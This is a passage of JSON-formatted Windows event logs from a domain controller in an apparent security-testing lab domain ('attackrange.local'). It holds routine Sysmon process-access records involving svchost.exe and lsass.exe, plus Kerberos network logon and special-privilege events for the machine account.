871","EventReceivedTime":"2020-08-01 07:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4327,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:47.907\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:47.907","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4328,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:47.907\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:47.907","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220443,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x65B00\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x65b00","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220444,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x65B00\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t0\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x65b00","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"0","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220445,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x65B4A\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x65b4a","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220446,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x65B4A\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t10.0.1.14\r\n\tSource Port:\t\t50146\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x65b4a","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"10.0.1.14","IpPort":"50146","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4329,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:48.017\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:48.017","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4330,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:48.017\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:48.017","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4331,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:48.017\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F5F-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31819|C:\\Windows\\system32\\lsasrv.dll+2f177|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:48.017","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F5F-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31819|C:\\Windows\\system32\\lsasrv.dll+2f177|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCR